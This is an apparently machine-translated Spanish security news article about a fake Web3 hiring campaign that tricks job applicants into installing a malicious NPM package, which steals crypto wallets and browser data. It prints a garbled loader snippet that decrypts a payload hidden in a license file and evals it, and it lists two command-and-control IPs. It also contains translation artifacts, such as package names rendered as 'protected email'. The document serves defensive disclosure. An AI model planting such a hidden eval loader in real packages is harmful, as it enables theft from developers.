Una sofisticada operación cibercriminal disfrazada de un equipo de desarrollo de Web3 ucraniano ha estado apuntando a solicitantes de empleo a través de paquetes de NPM armados, advierten los investigadores de seguridad.
El ataque aprovecha los procesos de entrevista falsos para engañar a los candidatos desprevenidos para descargar y ejecutar código malicioso que roba billeteras de criptomonedas, datos del navegador e información personal confidencial.
La campaña se centra en un repositorio de GitHub aparentemente legítimo llamado “Evacodes-Community/Ultrax”, que los atacantes presentan a los posibles empleados durante las entrevistas de primera ronda.
Las víctimas reciben instrucciones de clonar y ejecutar el repositorio localmente como parte de una evaluación técnica. Sin embargo, el proyecto contiene una dependencia de NPM maliciosa diseñada para cosechar datos confidenciales del sistema del objetivo.
El 9 de agosto de 2025, un miembro de la comunidad se acercó a los investigadores lentos después de sospechar del contenido del repositorio durante un proceso de entrevista.
El análisis posterior del equipo de seguridad reveló la presencia de una puerta trasera integrada dentro de las dependencias del proyecto, confirmando la naturaleza maliciosa de lo que parecía ser un repositorio de desarrollo Web3 estándar.
Analistas de SlowMist identificado que el ataque inicialmente utilizó el paquete NPM “(correo electrónico protegido)”, que luego fue reemplazado por “(correo electrónico protegido)” después de que el equipo de seguridad de NPM eliminó el paquete original.
El nuevo paquete, publicado el 8 de agosto de 2025, contiene un código muy ofuscado diseñado para evadir la detección mientras mantiene la misma funcionalidad maliciosa.
La amenaza se extiende más allá de las víctimas individuales, ya que los investigadores descubrieron que dos cuentas adicionales de Github habían bifurcado el repositorio malicioso, lo que sugiere una campaña más amplia dirigida a múltiples víctimas potenciales en todo el mercado laboral de Web3.
Mecanismo de infección y ejecución de código
El vector de infección del malware se basa en la ingeniería social en lugar de la explotación técnica, por lo que es particularmente peligroso para los solicitantes de empleo en el espacio Web3 competitivo.
Una vez que la víctima cliona el repositorio y ejecuta “instalación de NPM”, el paquete Malicioso RTK-Logger desencadena automáticamente su carga útil a través de un proceso sofisticado en varias etapas.
Ubicación del código malicioso (Fuente – Medio)
El código malicioso principal del paquete reside en “/rtk-logger/lib/utils/smtp-connection/index.js”, que utiliza el descifrado AES-256-CBC para desbloquear las cargas útiles ofuscadas almacenadas en el archivo de licencia.
El proceso de descifrado emplea claves codificadas y vectores de inicialización, lo que permite que el malware se ejecute sin una comunicación de red adicional durante la implementación inicial.
const fs = require (‘fs’); Const ruta = requerir (‘ruta’); const parselib = require (‘./ parse’) const filepath = path.join (__ dirname, ‘licencia’); fs.ReadFile (FilePath, ‘Utf8’, (_, data) => {try {eval (parselib (data))} capt (err) {console.error (‘Error durante el análisis/eval:’, err);}})
Después de un descifrado exitoso, el malware establece conexiones con los servidores de comando y control en 144.172.112.106 y 172.86.64.67, lo que permite el acceso remoto y las capacidades de exfiltración de datos mientras mantiene la persistencia a través de varias modificaciones a nivel de sistema.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
